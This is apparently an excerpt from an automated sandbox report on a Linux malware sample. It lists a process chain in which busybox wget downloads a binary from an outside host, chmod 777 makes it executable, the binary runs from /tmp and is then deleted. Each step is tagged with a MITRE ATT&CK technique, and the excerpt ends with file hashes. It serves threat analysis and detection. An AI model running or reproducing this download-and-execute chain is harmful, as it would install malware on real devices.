/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:1013
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:1014
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:1015
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:1016
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97